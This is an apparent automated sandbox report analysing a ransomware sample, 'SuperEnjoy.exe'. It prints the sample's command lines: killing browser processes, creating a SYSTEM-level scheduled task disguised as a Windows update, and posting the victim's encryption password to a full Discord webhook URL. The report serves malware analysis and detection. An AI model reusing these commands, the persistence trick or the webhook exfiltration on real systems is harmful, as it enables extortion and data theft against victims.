Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report SuperEnjoy.exe

Overview

General Information

Sample Name:SuperEnjoy.exe
Analysis ID:349595
MD5:b6ccb153be2baeb540e487cf5d52ee0b
SHA1:609f491429520427dd4b8034ea0f313481e19b43
SHA256:12db6f77d235f0af6461a490040f23e1dc902385de317cd19b5478df425f2ec0
Tags:filecoder

Most interesting Screenshot:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Binary is likely a compiled AutoIt script file
Creates files in the system32 config directory
Obfuscated command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Abnormal high CPU Usage
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w10x64
  • SuperEnjoy.exe (PID: 4700 cmdline: 'C:\Users\user\Desktop\SuperEnjoy.exe' MD5: B6CCB153BE2BAEB540E487CF5D52EE0B)
    • cmd.exe (PID: 4084 cmdline: 'C:\Windows\sysnative\cmd.exe' /c 'C:\Users\user\AppData\Local\Temp\EEFC.tmp\EEFD.tmp\EEFE.bat C:\Users\user\Desktop\SuperEnjoy.exe' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 1092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • attrib.exe (PID: 6136 cmdline: attrib C:\Users\user\Desktop\SuperEnjoy.exe +r +s +h MD5: FDC601145CD289C6FBC96D3F805F3CD7)
      • DiscordSendWebhook.exe (PID: 5440 cmdline: 'C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook' -m ':writing_hand: Currently encrypting files... Please wait until the password and fake btc acc are sended' -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4K MD5: FB7A78F485EC2586C54D60D293DD5352)
      • taskkill.exe (PID: 1064 cmdline: taskkill /f /im opera.exe MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
      • taskkill.exe (PID: 5972 cmdline: taskkill /f /im chrome.exe MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
      • taskkill.exe (PID: 5952 cmdline: taskkill /f /im firefox.exe MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
      • taskkill.exe (PID: 3176 cmdline: taskkill /f /im iexplore.exe MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
      • mshta.exe (PID: 4696 cmdline: 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\user\cryptormsg.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} MD5: 7083239CE743FDB68DFC933B7308E80A)
      • taskkill.exe (PID: 5992 cmdline: taskkill /f /im explorer.exe MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
      • schtasks.exe (PID: 6168 cmdline: schtasks /create /sc onlogon /tn UpdateWuauclt /rl highest /tr 'C:\Users\user\Desktop\SuperEnjoy.exe' /RU 'SYSTEM' MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
      • DiscordSendWebhook.exe (PID: 6184 cmdline: 'C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook' -m ':satellite: New Crypt from user, Password: nlhgQrx0YClnVSjR, FakeAccount: 5IpSW2U5mEVIu5q473DwAEJb0PR8B2Z' -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4K MD5: FB7A78F485EC2586C54D60D293DD5352)
      • cmd.exe (PID: 6356 cmdline: C:\Windows\system32\cmd.exe /c dir * /a-D /s /b | findstr /I /V /C:'^$' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • cmd.exe (PID: 6368 cmdline: C:\Windows\system32\cmd.exe /S /D /c' dir * /a-D /s /b ' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • findstr.exe (PID: 6388 cmdline: findstr /I /V /C:'^$' MD5: BCC8F29B929DABF5489C9BE6587FF66D)
  • SuperEnjoy.exe (PID: 6216 cmdline: C:\Users\user\Desktop\SuperEnjoy.exe MD5: B6CCB153BE2BAEB540E487CF5D52EE0B)
    • cmd.exe (PID: 6276 cmdline: 'C:\Windows\sysnative\cmd.exe' /c 'C:\Windows\Temp\1810.tmp\1811.tmp\1812.bat C:\Users\user\Desktop\SuperEnjoy.exe' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 6288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • attrib.exe (PID: 6324 cmdline: attrib C:\Users\user\Desktop\SuperEnjoy.exe +r +s +h MD5: FDC601145CD289C6FBC96D3F805F3CD7)
      • DiscordSendWebhook.exe (PID: 6340 cmdline: 'C:\Windows\Temp\1810.tmp\DiscordSendWebhook' -m ':writing_hand: Currently encrypting files... Please wait until the password and fake btc acc are sended' -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4K MD5: FB7A78F485EC2586C54D60D293DD5352)
      • taskkill.exe (PID: 6712 cmdline: taskkill /f /im opera.exe MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
      • taskkill.exe (PID: 6752 cmdline: taskkill /f /im chrome.exe MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
      • taskkill.exe (PID: 6800 cmdline: taskkill /f /im firefox.exe MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
      • taskkill.exe (PID: 6828 cmdline: taskkill /f /im iexplore.exe MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
      • mshta.exe (PID: 6884 cmdline: 'C:\Windows\SysWOW64\mshta.exe' 'C:\Windows\system32\config\systemprofile\cryptormsg.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} MD5: 7083239CE743FDB68DFC933B7308E80A)
      • taskkill.exe (PID: 6904 cmdline: taskkill /f /im explorer.exe MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
      • schtasks.exe (PID: 7104 cmdline: schtasks /create /sc onlogon /tn UpdateWuauclt /rl highest /tr 'C:\Users\user\Desktop\SuperEnjoy.exe' /RU 'SYSTEM' MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\aescrypt.exeMetadefender: Detection: 20%Perma Link
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\aescrypt.exeReversingLabs: Detection: 20%
Source: C:\Windows\Temp\1810.tmp\aescrypt.exeMetadefender: Detection: 20%Perma Link
Source: C:\Windows\Temp\1810.tmp\aescrypt.exeReversingLabs: Detection: 20%
Multi AV Scanner detection for submitted fileShow sources
Source: SuperEnjoy.exeVirustotal: Detection: 35%Perma Link

Compliance:

barindex
Detected unpacking (overwrites its own PE header)Show sources
Source: C:\Users\user\Desktop\SuperEnjoy.exeUnpacked PE file: 1.2.SuperEnjoy.exe.400000.0.unpack
Source: C:\Users\user\Desktop\SuperEnjoy.exeUnpacked PE file: 14.2.SuperEnjoy.exe.400000.0.unpack
Uses 32bit PE filesShow sources
Source: SuperEnjoy.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Uses secure TLS version for HTTPS connectionsShow sources
Source: unknownHTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.3:49727 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.3:49729 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.3:49730 version: TLS 1.2
Binary contains paths to debug symbolsShow sources
Source: Binary string: C:\Users\paulej\Documents\Source\AESCrypt\Windows\Console\Win32\Release\aescrypt.pdb source: SuperEnjoy.exe, 00000001.00000002.669844747.00000000025E0000.00000004.00000001.sdmp, SuperEnjoy.exe, 0000000E.00000002.668825687.0000000001000000.00000004.00000001.sdmp, aescrypt.exe.14.dr
Source: Binary string: C:\Users\paulej\Documents\Source\AESCrypt\Windows\Console\Win32\Release\aescrypt.pdb source: SuperEnjoy.exe, 00000001.00000002.669844747.00000000025E0000.00000004.00000001.sdmp, SuperEnjoy.exe, 0000000E.00000002.668825687.0000000001000000.00000004.00000001.sdmp, aescrypt.exe.14.dr
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003D4696 GetFileAttributesW,FindFirstFileW,FindClose,5_2_003D4696
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003DC93C FindFirstFileW,FindClose,5_2_003DC93C
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003DC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_003DC9C7
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003DF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_003DF200
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003DF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_003DF35D
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003DF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_003DF65E
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003D3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_003D3A2B
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003D3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_003D3D4E
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003DBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_003DBF27
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00AA4696 GetFileAttributesW,FindFirstFileW,FindClose,18_2_00AA4696
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00AAC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,18_2_00AAC9C7
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00AAC93C FindFirstFileW,FindClose,18_2_00AAC93C
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00AAF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,18_2_00AAF200
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00AAF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,18_2_00AAF35D
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00AAF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,18_2_00AAF65E
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00AA3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,18_2_00AA3A2B
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00AA3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,18_2_00AA3D4E
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00AABF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,18_2_00AABF27
Source: C:\Users\user\Desktop\SuperEnjoy.exeFile opened: C:\Users\user\AppData\Local\Temp\EEFC.tmpJump to behavior
Source: C:\Users\user\Desktop\SuperEnjoy.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Users\user\Desktop\SuperEnjoy.exeFile opened: C:\Users\user\AppData\Local\Temp\EEFC.tmp\EEFD.tmp\EEFE.tmpJump to behavior
Source: C:\Users\user\Desktop\SuperEnjoy.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Users\user\Desktop\SuperEnjoy.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: C:\Users\user\Desktop\SuperEnjoy.exeFile opened: C:\Users\user\AppData\Local\Temp\EEFC.tmp\EEFD.tmpJump to behavior
Source: Joe Sandbox ViewIP Address: 162.159.128.233 162.159.128.233
Source: Joe Sandbox ViewJA3 fingerprint: bd0bf25947d4a37404f0424edf4db9ad
Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003E25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,5_2_003E25E2
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: unknownDNS traffic detected: queries for: discord.com
Source: mshta.exe, 0000000A.00000002.676013549.000000000A930000.00000002.00000001.sdmpString found in binary or memory: http://%s.com
Source: DiscordSendWebhook.exe, 0000000D.00000003.229166020.0000000001751000.00000004.00000001.sdmp, DiscordSendWebhook.exe, 00000012.00000003.242559047.000000000171E000.00000004.00000001.sdmp, DiscordSendWebhook.exe, 00000012.00000003.237090886.0000000001705000.00000004.00000001.sdmpString found in binary or memory: http://Webhook1URL.com
Source: DiscordSendWebhook.exe, 0000000D.00000003.229166020.0000000001751000.00000004.00000001.sdmp, DiscordSendWebhook.exe, 00000012.00000003.242559047.000000000171E000.00000004.00000001.sdmp, DiscordSendWebhook.exe, 00000012.00000003.237090886.0000000001705000.00000004.00000001.sdmpString found in binary or memory: http://Webhook2URL.com
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://amazon.fr/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
Source: mshta.exe, 0000000A.00000002.676013549.000000000A930000.00000002.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://busca.orange.es/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
Source: DiscordSendWebhook.exe, 00000005.00000002.212957274.0000000001304000.00000004.00000001.sdmp, DiscordSendWebhook.exe, 0000000D.00000003.227744228.0000000001886000.00000004.00000001.sdmp, DiscordSendWebhook.exe, 00000012.00000002.243241458.0000000001739000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://cnet.search.com/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
Source: DiscordSendWebhook.exe, 00000005.00000002.212957274.0000000001304000.00000004.00000001.sdmp, DiscordSendWebhook.exe, 0000000D.00000003.227744228.0000000001886000.00000004.00000001.sdmp, DiscordSendWebhook.exe, 00000012.00000002.243241458.0000000001739000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: DiscordSendWebhook.exe, 00000005.00000002.212957274.0000000001304000.00000004.00000001.sdmp, DiscordSendWebhook.exe, 0000000D.00000003.227744228.0000000001886000.00000004.00000001.sdmp, DiscordSendWebhook.exe, 00000012.00000002.243241458.0000000001739000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: DiscordSendWebhook.exe, 00000012.00000002.243241458.0000000001739000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2Ii
Source: DiscordSendWebhook.exe, 00000005.00000002.212957274.0000000001304000.00000004.00000001.sdmp, DiscordSendWebhook.exe, 0000000D.00000003.227744228.0000000001886000.00000004.00000001.sdmp, DiscordSendWebhook.exe, 00000012.00000002.243241458.0000000001739000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://es.ask.com/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://find.joins.com/
Source: mshta.exe, 0000000A.00000002.674261524.00000000086D6000.00000002.00000001.sdmp, mshta.exe, 0000001D.00000002.673796991.00000000062D6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: DiscordSendWebhook.exe, 00000005.00000002.212957274.0000000001304000.00000004.00000001.sdmp, DiscordSendWebhook.exe, 0000000D.00000003.227744228.0000000001886000.00000004.00000001.sdmp, DiscordSendWebhook.exe, 00000012.00000002.243241458.0000000001739000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
